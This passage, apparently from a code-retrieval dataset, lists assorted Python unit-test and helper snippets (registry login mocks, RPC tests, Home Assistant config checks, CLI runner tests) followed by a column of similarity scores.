self.helper_thread.test_test_ports , ( ) )", "def test_registry_login_positive(self, request_api_mock):\n result = registry_login(\"username\", \"password\")\n expected_result = \"key\"\n self.assertEqual(result, expected_result)\n request_api_mock.assert_called_once()", "def test_check_from_deployment(self):\n from supvisors.rpcinterface import 
RPCInterface\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # test the call to _check_state\n with patch.object(rpc, '_check_state') as mocked_check:\n rpc._check_from_deployment()\n self.assertListEqual([call([1, 2, 3, 4, 5])], mocked_check.call_args_list)", "def test_retrieve_result(self):\n dr = EventualResult(Deferred(), None)\n uid = dr.stash()\n self.assertIdentical(dr, retrieve_result(uid))", "def test_working(self):\n mock_entry_working = mock.create_autospec(EntryPoint)\n mock_entry_working.name = \"Working\"\n mock_entry_working.load = self.successfulimport\n populate_entry_points([mock_entry_working])", "async def run_check_service(call):\r\n result = await run_check(str(hass.config.path()))\r\n hass.components.persistent_notification.async_create(\r\n result, \"Configuration Check Result\", NOTIFYID\r\n )\r\n if result == \"\\nConfiguration is OK!\\n\":\r\n finish_service = call.data.get(\"service\")\r\n finish_service_data = call.data.get(\"service_data\", {})\r\n if finish_service is not None:\r\n domain = finish_service.split(\".\")[0]\r\n service = finish_service.split(\".\")[1]\r\n await hass.services.async_call(domain, service, finish_service_data)", "def test_regular_result(self):\n passthrough = self.make_wrapped_function()\n result = passthrough(123)\n self.assertIsInstance(result, EventualResult)\n self.assertEqual(result.wait(0.1), 123)", "def test_fixture_list_runs(tmp_sample_project):\n config_dir = tmp_sample_project\n output = subprocess.run([\"smif\", \"list\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_water_cp_cr\" in str(output.stdout)\n assert \"energy_central\" in str(output.stdout)\n\n # Run energy_central and re-check output with optional flag for completed results\n subprocess.run([\"smif\", \"run\", \"energy_central\", \"-d\", config_dir], stdout=subprocess.PIPE)\n output = subprocess.run([\"smif\", \"list\", \"-c\", \"-d\", config_dir], stdout=subprocess.PIPE)\n assert \"energy_central *\" in str(output.stdout)", "def test_process(self):\n xknx = XKNX()\n sensor = Sensor(\n xknx, \"TestSensor\", value_type=\"temperature\", group_address_state=\"1/2/3\"\n )\n\n telegram = Telegram(\n destination_address=GroupAddress(\"1/2/3\"),\n payload=GroupValueWrite(DPTArray((0x06, 0xA0))),\n )\n self.loop.run_until_complete(sensor.process(telegram))\n self.assertEqual(sensor.sensor_value.payload, DPTArray((0x06, 0xA0)))\n self.assertEqual(sensor.resolve_state(), 16.96)", "def test_ProstateReporting1(self):\n\n self.delayDisplay(\"Starting the test\")\n\n self.delayDisplay('Test passed!')", "def pytest_started_handling_group(session, worker):", "def waitUntilSuccess():", "def test_run(self):\n class MockProvider(BaseCoverageProvider):\n SERVICE_NAME = \"I do nothing\"\n was_run = False\n\n def run_once_and_update_timestamp(self):\n \"\"\"Set a variable.\"\"\"\n self.was_run = True\n return None\n\n provider = MockProvider(self._db)\n result = provider.run()\n\n # run_once_and_update_timestamp() was called.\n assert True == provider.was_run\n\n # run() returned a CoverageProviderProgress with basic\n # timing information, since run_once_and_update_timestamp()\n # didn't provide anything.\n assert isinstance(result, CoverageProviderProgress)\n now = utc_now()\n assert result.start < result.finish\n for time in (result.start, result.finish):\n assert (now - time).total_seconds() < 5", "def test_main_succeeds(app_tester: ApplicationTester) -> None:\n assert app_tester.execute(\"\") == 0", "def validate_Exec_Shell_Background(result, 
_dummy_command, _dummy_regex=None):\n return result is not None", "def test_run_simulation_stores_result(self):\n sim = ss.Simulation()\n assert sim.results == []\n sim.run_simulation(10)\n assert sim.results != []\n assert len(sim.results) == 10", "def test_lookup_adds_callback(self):\n # Reset event_loop so we start in a clean state.\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n self.event_loop = asyncio.get_event_loop()\n lookup = Lookup(FindValue, self.target, self.node, self.event_loop)\n lookup._handle_response = mock.MagicMock()\n keys = []\n for k, v in lookup.pending_requests.items():\n keys.append(k)\n v.set_result('foo')\n self.event_loop.run_until_complete(v)\n self.assertEqual(lookup._handle_response.call_count, 3)\n for i, key in enumerate(keys):\n # check the callback called _handle_response with the correct\n # arguments.\n arg_key = lookup._handle_response.call_args_list[i][0][0]\n self.assertEqual(arg_key, key)\n arg_contact = lookup._handle_response.call_args_list[i][0][1]\n self.assertIn(arg_contact, lookup.contacted)\n arg_future = lookup._handle_response.call_args_list[i][0][2]\n self.assertEqual(arg_future.result(), 'foo')", "def test_run_prefix__success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**MOCKED_UPLOADS),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n return_value=UploadSamples(**{}),\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def testing(self):\n print('test successful')", "async def test1(self):\n return True", "def test_calls_success_callback(self):\n from furious.async import Async\n from furious.context._execution import _ExecutionContext\n from furious.processors import run_job\n\n call_count = []\n\n def do_things():\n call_count.append(1)\n\n work = Async(target=dir, args=[1],\n callbacks={'success': do_things})\n\n with _ExecutionContext(work):\n run_job()\n\n self.assertEqual(1, len(call_count))", "def test_BLINK_LAUNCH_PROCESS(self):\n self.verify_references_to_prerequisites(processes.BLINK_LAUNCH_PROCESS)", "def test_execution(self):\n self.assertTrue(True)", "def execute(self):\n\n self._status = 'Running'\n\n try:\n self._init_staf_handle()\n self._ping()\n\n if self._sut.os == 'Linux':\n self._linux_power_control()\n elif self._sut.os == 'Windows':\n self._windows_power_control()\n else:\n raise CoreError(\"Unknown OS platform: {0}\".format(self._sut.os))\n\n if self._wait:\n sleep(BespokeGlobals.VM_BOOT_WAIT)\n\n self._status = 'Pass'\n except CoreError as e:\n self._status = 'Fatal'\n self._message = e.msg\n finally:\n self._close_staf_handle()\n\n #Notify TestCase that a failure occurred.\n if self._status == 'Fatal': raise FatalError(self._message)", "def test_isRunning_valve_noPump(self):\n\t\tdef mock_def(uri, *args):\n\t\t\tif(uri == u\"ch.db.getdevicedata\"):\n\t\t\t\treturn {'name':'testValve', 'type':'valve', 'group':1, 'id':1, 'description': 
''}\n\t\t\telif(uri == u\"ch.gpio.isrunning\"):\n\t\t\t\tif(args[0] == 1):\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(\"Given device id does not exist ({})\".format(args[0]))\n\t\t\telif(uri == u\"ch.gpio.switch\"):\n\t\t\t\treturn \"success\"\n\t\t\telif(uri == u\"ch.db.getdevicegroup\"):\n\t\t\t\treturn []\n\t\t\telse:\n\t\t\t\traise ValueError(\"Given URI does not exist ({})\".format(uri))\n\t\tdm = DeviceManager()\n\t\tdm.sessionID = None\n\t\tdm.call=MagicMock(side_effect=mock_def)\n\t\tdm.publish = MagicMock()\n\t\tself.assertEqual(self.successResultOf(dm.switchIfAllowed('testValve', None)), \"success\")", "def test_get_results(self):\n pass", "def test_run_prefix__filter_success(mocker):\n runner = CliRunner()\n mocked_login = mocker.patch.object(APIClient, \"login\", return_value=None)\n mocked_uploads_copy = copy.deepcopy(MOCKED_UPLOADS)\n del mocked_uploads_copy[\"results\"][1]\n mocked_get_sample_sheet = mocker.patch.object(\n APIClient,\n \"get_sample_sheet\",\n return_value=SampleSheet(**mocked_uploads_copy),\n )\n mocked_add_samples_to_project = mocker.patch.object(\n APIClient,\n \"add_samples_to_project\",\n )\n\n res = runner.invoke(\n run_prefix,\n [\n str(uuid4()),\n \"gncv://batch\",\n \"--status\",\n \"unassigned\",\n \"--email\",\n \"[email protected]\",\n \"--password\",\n \"123\",\n ],\n )\n assert res.exit_code == 0\n mocked_login.assert_called_once()\n mocked_get_sample_sheet.assert_called_once()\n mocked_add_samples_to_project.assert_called_once()\n assert \"Number of samples assigned to the project\" in res.output\n assert \"Assigning metadata to the uploaded samples.\" not in res.output", "def test_makeliststep_test():\n result = MakeListStep.call(par1=DEFAULT_PAR1, par2=DEFAULT_PAR2)\n\n assert result == DEFAULT_RESULT", "def test_run_ended(self):" ]
[ "0.7666267", "0.6480155", "0.63547766", "0.63009536", "0.6242489", "0.623529", "0.61790955", "0.6141608", "0.61038685", "0.6090213", "0.6060126", "0.6026361", "0.5984391", "0.59258854", "0.5911147", "0.5894738", "0.5893941", "0.5885163", "0.58836126", "0.5859428", "0.5853621", "0.58424735", "0.5832467", "0.581189", "0.5784105", "0.5783848", "0.5765767", "0.57650566", "0.5757758", "0.5756335", "0.57089907", "0.5702386", "0.5702168", "0.57018155", "0.56833047", "0.5681764", "0.5678018", "0.5673475", "0.5673475", "0.56597596", "0.5655864", "0.56363946", "0.56331784", "0.5628814", "0.5626802", "0.56212306", "0.56199795", "0.5606048", "0.5592981", "0.5585292", "0.5582767", "0.55786103", "0.5563068", "0.55530024", "0.55488074", "0.5548368", "0.55397356", "0.55278593", "0.5523607", "0.5510237", "0.55099434", "0.549857", "0.54977375", "0.54964614", "0.54957014", "0.54933834", "0.5488088", "0.54826945", "0.54606074", "0.5452612", "0.5450533", "0.5443458", "0.5440403", "0.5438665", "0.54372543", "0.54319817", "0.5419808", "0.541003", "0.5389453", "0.53891", "0.536971", "0.53667706", "0.5359618", "0.5357203", "0.53500086", "0.5349103", "0.5349028", "0.5346788", "0.53446424", "0.5344073", "0.5343744", "0.5341055", "0.5338932", "0.53322566", "0.53318715", "0.5328586", "0.53278244", "0.5324775", "0.5317329", "0.5315886" ]
0.6334782
3
Test POST a start call registry to the registry API and expect to recover it using a GET request. Test uses the start_call_fx fixture
def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):
    url = reverse_lazy('calls:registry-list')
    post_request = client.post(url, start_call_fx, content_type='application/json')
    assert post_request.status_code == status.HTTP_201_CREATED
    job_url = post_request.data.get('job_id')
    job_request = client.get(job_url)
    result = json.loads(job_request.data.get('result'))
    get_request = client.get(result.get('url'))
    response = get_request.json()
    assert get_request.status_code == status.HTTP_200_OK
    for key, value in start_call_fx.items():
        assert value == response.get(key)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n task_url = response_data.get('job_id', None)\n\n task_response = client.get(task_url)\n\n assert task_response.status_code == status.HTTP_200_OK", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def testTurbiniaStart(self, mock_create_request):\n 
mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def test_call(self):\n\n with Client('username', 'password') as client:\n self.setSessionResponse(content='{\"ok\": true}')\n data = client.call(**self.build_parameters)\n self.assertEqual(data, '{\"ok\": true}')", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device\n response = self.client.post(self.incoming_url, call_data)\n\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.ios_app,\n )\n call_data['call_id'] = 'sduiqayduiryqwuioeryqwer76789'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_fax_inbound_automation_post(self):\n pass", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 
'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def test_ready_post(self):\n response = self.client.open(\n '/ready',\n method='POST')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_machine(self, pretty_print, owner_api_token):\n machine = setup_data.get('start_machine', {}).get('machine') \\\n or setup_data.get('machine') or 'my-machine'\n uri = MIST_URL + \\\n '/api/v2/machines/{machine}/actions/start'.format(machine=machine)\n request = MistRequests(\n api_token=owner_api_token,\n uri=uri)\n request_method = getattr(request, 'POST'.lower())\n response = request_method()\n if 'start_machine' in REDIRECT_OPERATIONS:\n assert_response_found(response)\n else:\n assert_response_ok(response)\n assert poll(\n api_token=owner_api_token,\n uri=setup_data['amazon_machine_uri'],\n data={'state': 'running', 'actions': {'stop': True}},\n timeout=_setup_module.DEFAULT_TIMEOUT)\n print('Success!!!')", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_start(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n response = requests.get(url)\n\n assert response.status_code == 200\n assert response.headers[\"content-type\"] == \"text/html; charset=utf-8\"\n\n assert len(response.text) > 0", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def call_init(mac_address, ip_address, start_port, free_ports):\n url = INIT_URL\n init_dict = {'IPAddress': ip_address, 'MacAddress': mac_address, 'OpenPorts': free_ports, 'StartPort': start_port}\n logging.info(\"Calling coordinator at url: %s, with dict: %s\", url, str(init_dict))\n try:\n resp = requests.post(url, json=init_dict, timeout=10)\n except requests.exceptions.RequestException as e:\n return None, e\n return resp, None", "def test_request_first_step(self, mock_step1_is_complete):\n mock_step1_is_complete.return_value = False\n\n self.tour1.load_tour_class().add_user(self.test_user)\n mock_request = Mock(user=self.test_user, path='mock1', method='get', GET={})\n mock_view = MockView(request=mock_request)\n response = 
mock_view.dispatch(mock_request)\n self.assertEqual(200, response.status_code)", "def test_run(self, mock):\n mock.return_value = mock_trello_service()\n\n pull_requests = PullRequest.query.all()\n self.assertTrue(len(pull_requests) is 0)\n\n payload = json_fixture('./tests/fixtures/pull_request_opened.json')\n CreatePullRequestCard.delay(\n board_id=default_board_id,\n list_id=default_list_id,\n name='Fake Pull Request',\n payload=payload\n )\n\n # Enqueuing new pull_request `CreatePullRequestCard` should create a\n # `PullRequest` record\n new_pull_requests = PullRequest.query.all()\n self.assertTrue(len(new_pull_requests) is 1)", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def Start(sliver_name):\n rec = sliver_name\n account.get(rec['name']).start(rec)\n logger.log(\"api_calls: Start %s\"%rec['name'])", "def test_turnon(\n fauxmo_server: pytest.fixture, simplehttpplugin_target: pytest.fixture\n) -> None:\n data = (\n b'SOAPACTION: \"urn:Belkin:service:basicevent:1#SetBinaryState\"'\n b\"<BinaryState>1</BinaryState>\"\n )\n\n resp = requests.post(\n \"http://127.0.0.1:12345/upnp/control/basicevent1\", data=data\n )\n assert resp.status_code == 200", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def test_run_workflow_by_payload(self):\n full_task_payload = {\n \"workflow_name\" : \"workflow_name\",\n \"input_mappings\" : \"input_mappings\"\n}\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = self.client.open(\n '/run/workflow/',\n method='POST',\n headers=headers,\n data=json.dumps(full_task_payload),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_request(comms):\n kernel_comm, frontend_comm = comms\n\n def handler(a, b):\n return a + 
b\n\n kernel_comm.register_call_handler('test_request', handler)\n\n res = frontend_comm.remote_call(blocking=True).test_request('a', b='b')\n\n assert res == 'ab'", "def test_POST_fetcher():\n params = {\n 'key1':'value1',\n 'arg2':'value2'\n }\n data = {\n 'data1':'value1',\n 'data2':'morevalues'\n }\n\n ## test that request goes ok\n resp = wf_utils.fetch_POST_request(\n POST_ECHO_ENDPOINT,\n data,\n params=params\n )\n\n ## test that response can be parsed\n payload = resp.json()\n\n ## test that response contains expected echo\n assert payload['args'] == params\n assert payload['data'] == data\n assert payload['headers']['user-agent'] == wf_utils.USER_AGENT", "def test_registry_login_positive(self, request_api_mock):\n result = registry_login(\"username\", \"password\")\n expected_result = \"key\"\n self.assertEqual(result, expected_result)\n request_api_mock.assert_called_once()", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def test_success_start(self, put, get, auth, circuits_app, fn_cloud_foundry_action, fn_cloud_foundry_applications):\n auth.return_value = AuthenticationMock()\n put.return_value = give_response(201, GUIDS_MOCK[\"resources\"][0])\n get.return_value = give_response(200, GUIDS_MOCK)\n\n function_params = {\n \"fn_cloud_foundry_action\": fn_cloud_foundry_action,\n \"fn_cloud_foundry_applications\": fn_cloud_foundry_applications\n }\n results = call_fn_cloud_foundry_manage_applications_function(circuits_app, function_params)\n assert results[\"test1\"][\"success\"] == True\n assert results[\"test1\"][\"current_state\"] == \"STARTED\"", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_create_empty_payload(self):\n response = self.client.post('/routines/', data={})\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def 
test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "async def test_fn_create(app: Quart) -> None:\n test_client = app.test_client()\n response = await test_client.post(\n \"/fn\", json=VALID_TASK_BASIC\n )\n assert response.status_code == 200\n response_json = await response.get_json()\n assert response_json == VALID_TASK_BASIC", "def post(self):\n data = api.payload\n\n try:\n phone_call = PhoneCallStart(\n parser.parse(data[\"start_timestamp\"]),\n data[\"call_id\"],\n data[\"source\"],\n data[\"destination\"]\n )\n except AssertionError as error:\n return error.args, 400\n\n repository.db.session.add(phone_call)\n repository.db.session.commit()\n\n return phone_call, 201", "def testPostEndpoints(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # Register an importer\n importer = ImportListener()\n context.register_service(pelix.remote.SERVICE_IMPORT_ENDPOINT_LISTENER,\n importer,\n {pelix.remote.PROP_REMOTE_CONFIGS_SUPPORTED:\n exporter.configs[0]})\n\n # Register a service\n context.register_service(\"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Get its representation\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n self.assertEqual(status, 200)\n\n # Change its UID and framework UID\n endpoint_data = json.loads(response)\n endpoint_data['uid'] = 'other-uid'\n endpoint_data['name'] = 'other-name'\n endpoint_data['sender'] = 'other-framework'\n\n # Send the 'discovered' event\n status, response = self._http_post(\"endpoints\",\n json.dumps([endpoint_data]))\n self.assertEqual(status, 200)\n self.assertEqual(response, 'OK')\n\n # Ensure that the service has been registered\n imported_endpoint = importer.endpoints[endpoint_data['uid']]\n self.assertEqual(imported_endpoint.uid, endpoint_data['uid'])\n self.assertEqual(imported_endpoint.framework, endpoint_data['sender'])\n self.assertEqual(imported_endpoint.name, endpoint_data['name'])", "def test_service_call(self, create_connection):\n create_connection.return_value = Mock()\n create_connection.return_value.recv = Mock(return_value=msgpack.packb(None))\n\n adress = ('127.0.0.1', 20001)\n method_name = 'foo'\n method_params = [12]\n\n expected_data = service_call.encode_call(method_name, method_params)\n\n service_call.call(adress, method_name, method_params)\n\n create_connection.assert_any_call(adress)\n create_connection.return_value.sendall.assert_any_call(expected_data)", "def setUp(self):\n self.staff = get_user_model().objects.create_user(\n email='[email protected]',\n password='staffpassword1234',\n username='staffusername'\n )\n self.staff.is_staff = True\n self.staff.save()\n self.staff.refresh_from_db()\n\n self.client = APIClient()\n self.client.force_authenticate(user=self.staff)\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.id],\n 'overview': '<strong>Bla</strong> bla bla',\n }\n\n \"\"\"Test that list 
